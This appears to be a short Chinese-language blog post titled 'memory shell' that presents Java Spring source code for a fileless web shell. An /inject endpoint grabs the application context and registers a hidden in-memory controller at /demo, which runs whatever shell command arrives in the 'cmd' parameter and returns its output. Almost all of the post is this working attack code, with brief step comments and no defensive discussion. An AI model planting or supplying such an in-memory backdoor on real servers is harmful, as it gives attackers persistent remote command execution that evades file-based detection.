内存马
package com.naihe.controller;import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;import javax.servlet.http.HttpServletRequest;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.reflect.Method;@Controller
public class Demo {@ResponseBody@RequestMapping(value = "/inject", method = RequestMethod.GET)public void inject() throws NoSuchMethodException {// 1. 利用spring内部方法获取contextWebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);// 2. 从context中获得 RequestMappingHandlerMapping 的实例RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);// 3. 通过反射获得自定义 controller 中的 Method 对象Method method = InjectToController.class.getMethod("test");// 4. 定义访问 controller 的 URL 地址PatternsRequestCondition url = new PatternsRequestCondition("/demo");// 5. 定义允许访问 controller 的 HTTP 方法(GET/POST)RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();// 6. 在内存中动态注册 controllerRequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);InjectToController injectToController = new InjectToController();mappingHandlerMapping.registerMapping(info, injectToController, method);}@ResponseBodypublic class InjectToController {public InjectToController(){}public String test() throws Exception {// 获取requestHttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();InputStream is = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();InputStreamReader isr = new InputStreamReader(is, "UTF-8");BufferedReader br = new BufferedReader(isr);String str = "";String line = "";while ((line = br.readLine())!=null){str+=line;}is.close();br.close();return str;}}
}
效果